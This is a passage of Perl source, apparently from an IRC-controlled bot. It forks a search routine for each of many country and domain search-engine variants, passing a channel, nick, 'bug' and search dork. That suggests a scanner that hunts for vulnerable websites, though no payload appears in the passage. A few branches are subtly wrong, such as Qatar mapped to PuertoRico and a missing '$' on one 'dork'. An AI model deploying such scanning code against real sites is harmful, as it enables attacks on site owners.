&type($chan,$bug,$dork,"Grenada",$type,$nick); } exit; } } if ($engine =~ /honduras/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Honduras",$type,$nick); } exit; } } if ($engine =~ /hongkong/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Hongkong",$type,$nick); } exit; } } if ($engine =~ /iceland/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Iceland",$type,$nick); } exit; } } if ($engine =~ /ireland/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Ireland",$type,$nick); } exit; } } if ($engine =~ /kenya/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Kenya",$type,$nick); } exit; } } if ($engine =~ /kuwait/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Kuwait",$type,$nick); } exit; } } if ($engine =~ /laos/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Laos",$type,$nick); } exit; } } if ($engine =~ /latvia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Latvia",$type,$nick); } exit; } } if ($engine =~ /liberia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Liberia",$type,$nick); } exit; } } if ($engine =~ /libyan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Libyan",$type,$nick); } exit; } } if ($engine =~ /lithuania/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Lithuania",$type,$nick); } exit; } } if ($engine =~ /macedonia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Macedonia",$type,$nick); } exit; } } if ($engine =~ /malta/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Malta",$type,$nick); } exit; } } if ($engine =~ /mongolia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Mongolia",$type,$nick); } exit; } } if ($engine =~ /mozambique/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Mozambique",$type,$nick); } exit; } } if ($engine =~ /namibia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Namibia",$type,$nick); } exit; } } if ($engine =~ /nauru/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Nauru",$type,$nick); } exit; } } if ($engine =~ /nepal/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Nepal",$type,$nick); } exit; } } if ($engine =~ /newzealand/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NewZealand",$type,$nick); } exit; } } if ($engine =~ /nigeria/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Nigeria",$type,$nick); } exit; } } if ($engine =~ /paraguay/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Paraguay",$type,$nick); } exit; } } if ($engine =~ /peru/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Peru",$type,$nick); } exit; } } if ($engine =~ /portugal/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Portugal",$type,$nick); } exit; } } if ($engine =~ /puertorico/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PuertoRico",$type,$nick); } exit; } } if ($engine =~ /qatar/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PuertoRico",$type,$nick); } exit; } } if ($engine =~ /saintlucia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SaintLucia",$type,$nick); } exit; } } if ($engine =~ /samoa/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Samoa",$type,$nick); } exit; } } if ($engine =~ /saudiarabia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,dork,"SaudiArabia",$type,$nick); } exit; } } if ($engine =~ /senegal/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Senegal",$type,$nick); } exit; } } if ($engine =~ /slovakia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Slovakia",$type,$nick); } exit; } } if ($engine =~ /srilanka/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Srilanka",$type,$nick); } exit; } } if ($engine =~ /swaziland/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Swaziland",$type,$nick); } exit; } } if ($engine =~ /tajikistan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Tajikistan",$type,$nick); } exit; } } if ($engine =~ /tanzania/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Tanzania",$type,$nick); } exit; } } if ($engine =~ /tokelau/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Tokelau",$type,$nick); } exit; } } if ($engine =~ /tonga/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Tonga",$type,$nick); } exit; } } if ($engine =~ /tunisia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Tunisia",$type,$nick); } exit; } } if ($engine =~ /uruguay/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Uruguay",$type,$nick); } exit; } } if ($engine =~ /uzbekistan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Uzbekistan",$type,$nick); } exit; } } if ($engine =~ /venezuela/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Venezuela",$type,$nick); } exit; } } if ($engine =~ /yemen/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Yemen",$type,$nick); } exit; } } if ($engine =~ /yugoslavia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Yugoslavia",$type,$nick); } exit; } } if ($engine =~ /zambia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Zambia",$type,$nick); } exit; } } if ($engine =~ /uganda/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Uganda",$type,$nick); } exit; } } if ($engine =~ /trinidad/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Trinidad",$type,$nick); } exit; } } if ($engine =~ /zimbabwe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Zimbabwe",$type,$nick); } exit; } } if ($engine =~ /jackae/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKAE",$type,$nick); } exit; } } if ($engine =~ /jackar/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKAR",$type,$nick); } exit; } } if ($engine =~ /jackat/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKAT",$type,$nick); } exit; } } if ($engine =~ /jackau/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKAU",$type,$nick); } exit; } } if ($engine =~ /jackbr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKBR",$type,$nick); } exit; } } if ($engine =~ /jackca/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKCA",$type,$nick); } exit; } } if ($engine =~ /jackcl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKCL",$type,$nick); } exit; } } if ($engine =~ /jackcn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKCN",$type,$nick); } exit; } } if ($engine =~ /jackcom/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKCoM",$type,$nick); } exit; } } if ($engine =~ /jackcz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKCZ",$type,$nick); } exit; } } if ($engine =~ /jackde/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKDE",$type,$nick); } exit; } } if ($engine =~ /jackdk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKDK",$type,$nick); } exit; } } if ($engine =~ /jackes/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKES",$type,$nick); } exit; } } if ($engine =~ /jackeu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKEU",$type,$nick); } exit; } } if ($engine =~ /jackfr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKFR",$type,$nick); } exit; } } if ($engine =~ /jackhu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKHU",$type,$nick); } exit; } } if ($engine =~ /jackid/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKID",$type,$nick); } exit; } } if ($engine =~ /jackil/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKIL",$type,$nick); } exit; } } if ($engine =~ /jackin/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKIN",$type,$nick); } exit; } } if ($engine =~ /jackinfo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKInfO",$type,$nick); } exit; } } if ($engine =~ /jackir/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKIR",$type,$nick); } exit; } } if ($engine =~ /jackit/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKIT",$type,$nick); } exit; } } if ($engine =~ /jackjp/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKJP",$type,$nick); } exit; } } if ($engine =~ /jackkr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKKR",$type,$nick); } exit; } } if ($engine =~ /jackmx/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKMX",$type,$nick); } exit; } } if ($engine =~ /jackmy/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKMY",$type,$nick); } exit; } } if ($engine =~ /jacknet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKNeT",$type,$nick); } exit; } } if ($engine =~ /jacknl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKNL",$type,$nick); } exit; } } if ($engine =~ /jackorg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKOrG",$type,$nick); } exit; } } if ($engine =~ /jackph/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKPH",$type,$nick); } exit; } } if ($engine =~ /jackpl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKPL",$type,$nick); } exit; } } if ($engine =~ /jackro/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKRO",$type,$nick); } exit; } } if ($engine =~ /jackru/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKRU",$type,$nick); } exit; } } if ($engine =~ /jackth/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKTH",$type,$nick); } exit; } } if ($engine =~ /jackua/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKUA",$type,$nick); } exit; } } if ($engine =~ /jackuk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKUK",$type,$nick); } exit; } } if ($engine =~ /jackus/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKUS",$type,$nick); } exit; } } if ($engine =~ /jacksi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKSI",$type,$nick); } exit; } } if ($engine =~ /jackbe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKBE",$type,$nick); } exit; } } if ($engine =~ /jackbiz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKBIZ",$type,$nick); } exit; } } if ($engine =~ /jackxxx/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKXXX",$type,$nick); } exit; } } if ($engine =~ /jacktel/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKTEL",$type,$nick); } exit; } } if ($engine =~ /jacktv/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKTV",$type,$nick); } exit; } } if ($engine =~ /jackcc/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKCC",$type,$nick); } exit; } } if ($engine =~ /jackmil/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKMIL",$type,$nick); } exit; } } if ($engine =~ /jackasia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKASIA",$type,$nick); } exit; } } if ($engine =~ /jackname/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKNAME",$type,$nick); } exit; } } if ($engine =~ /jackpro/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKPRO",$type,$nick); } exit; } } if ($engine =~ /jacktravel/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKTRAVEL",$type,$nick); } exit; } } if ($engine =~ /jackcat/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKCAT",$type,$nick); } exit; } } if ($engine =~ /jackjobs/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKJOBS",$type,$nick); } exit; } } if ($engine =~ /jackmobi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKMOBI",$type,$nick); } exit; } } if ($engine =~ /jackaero/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKAERO",$type,$nick); } exit; } } if ($engine =~ /jackcoop/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKCOOP",$type,$nick); } exit; } } if ($engine =~ /jackedu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKEDU",$type,$nick); } exit; } } if ($engine =~ /jackgov/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKGOV",$type,$nick); } exit; } } if ($engine =~ /jackas/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKAS",$type,$nick); } exit; } } if ($engine =~ /jackai/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKAI",$type,$nick); } exit; } } if ($engine =~ /jackag/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKAG",$type,$nick); } exit; } } if ($engine =~ /jackaz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKAZ",$type,$nick); } exit; } } if ($engine =~ /jackbh/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKBH",$type,$nick); } exit; } } if ($engine =~ /jackbd/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKBD",$type,$nick); } exit; } } if ($engine =~ /jackbz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKBZ",$type,$nick); } exit; } } if ($engine =~ /jackbo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKBO",$type,$nick); } exit; } } if ($engine =~ /jackba/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKBA",$type,$nick); } exit; } } if ($engine =~ /jackbw/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKBW",$type,$nick); } exit; } } if ($engine =~ /jackvg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKVG",$type,$nick); } exit; } } if ($engine =~ /jackbg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKBG",$type,$nick); } exit; } } if ($engine =~ /jackbi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKBI",$type,$nick); } exit; } } if ($engine =~ /jackco/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKCO",$type,$nick); } exit; } } if ($engine =~ /jackcd/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKCD",$type,$nick); } exit; } } if ($engine =~ /jackcg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKCG",$type,$nick); } exit; } } if ($engine =~ /jackck/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKCK",$type,$nick); } exit; } } if ($engine =~ /jackcr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKCR",$type,$nick); } exit; } } if ($engine =~ /jackhr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKHR",$type,$nick); } exit; } } if ($engine =~ /jackcu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKCU",$type,$nick); } exit; } } if ($engine =~ /jackci/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKCI",$type,$nick); } exit; } } if ($engine =~ /jackdj/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKDJ",$type,$nick); } exit; } } if ($engine =~ /jackdm/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKDM",$type,$nick); } exit; } } if ($engine =~ /jackdo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKDO",$type,$nick); } exit; } } if ($engine =~ /jackec/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKEC",$type,$nick); } exit; } } if ($engine =~ /jackeg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKEG",$type,$nick); } exit; } } if ($engine =~ /jacksv/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKSV",$type,$nick); } exit; } } if ($engine =~ /jackee/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKEE",$type,$nick); } exit; } } if ($engine =~ /jacket/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKET",$type,$nick); } exit; } } if ($engine =~ /jackfj/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKFJ",$type,$nick); } exit; } } if ($engine =~ /jackfi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKFI",$type,$nick); } exit; } } if ($engine =~ /jackgm/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKGM",$type,$nick); } exit; } } if ($engine =~ /jackgi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKGI",$type,$nick); } exit; } } if ($engine =~ /jackgr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKGR",$type,$nick); } exit; } } if ($engine =~ /jackgl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKGL",$type,$nick); } exit; } } if ($engine =~ /jackgt/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKGT",$type,$nick); } exit; } } if ($engine =~ /jackgg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKGG",$type,$nick); } exit; } } if ($engine =~ /jackht/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKHT",$type,$nick); } exit; } } if ($engine =~ /jackhn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKHN",$type,$nick); } exit; } } if ($engine =~ /jackhk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKHK",$type,$nick); } exit; } } if ($engine =~ /jackis/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKIS",$type,$nick); } exit; } } if ($engine =~ /jackie/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKIE",$type,$nick); } exit; } } if ($engine =~ /jackim/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKIM",$type,$nick); } exit; } } if ($engine =~ /jackje/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKJE",$type,$nick); } exit; } } if ($engine =~ /jackjo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKJO",$type,$nick); } exit; } } if ($engine =~ /jackkz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKKZ",$type,$nick); } exit; } } if ($engine =~ /jackke/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKKE",$type,$nick); } exit; } } if ($engine =~ /jackkg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKKG",$type,$nick); } exit; } } if ($engine =~ /jacklv/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKLV",$type,$nick); } exit; } } if ($engine =~ /jackls/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKLS",$type,$nick); } exit; } } if ($engine =~ /jackly/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKLY",$type,$nick); } exit; } } if ($engine =~ /jackli/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKLI",$type,$nick); } exit; } } if ($engine =~ /jacklt/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKLT",$type,$nick); } exit; } } if ($engine =~ /jacklu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKLU",$type,$nick); } exit; } } if ($engine =~ /jackmw/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKMW",$type,$nick); } exit; } } if ($engine =~ /jackmt/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKMT",$type,$nick); } exit; } } if ($engine =~ /jackmu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKMU",$type,$nick); } exit; } } if ($engine =~ /jackfm/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKFM",$type,$nick); } exit; } } if ($engine =~ /jackmn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKMN",$type,$nick); } exit; } } if ($engine =~ /jackms/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKMS",$type,$nick); } exit; } } if ($engine =~ /jackma/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKMA",$type,$nick); } exit; } } if ($engine =~ /jackna/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKNA",$type,$nick); } exit; } } if ($engine =~ /jacknp/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKNP",$type,$nick); } exit; } } if ($engine =~ /jacknz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKNZ",$type,$nick); } exit; } } if ($engine =~ /jackni/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKNI",$type,$nick); } exit; } } if ($engine =~ /jacknf/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKNF",$type,$nick); } exit; } } if ($engine =~ /jackno/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKNO",$type,$nick); } exit; } } if ($engine =~ /jackom/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JacKOM",$type,$nick); } exit; } } if ($engine =~ /jackpk/i) { if (my $pid = fork) { waitpid($pid, 0); 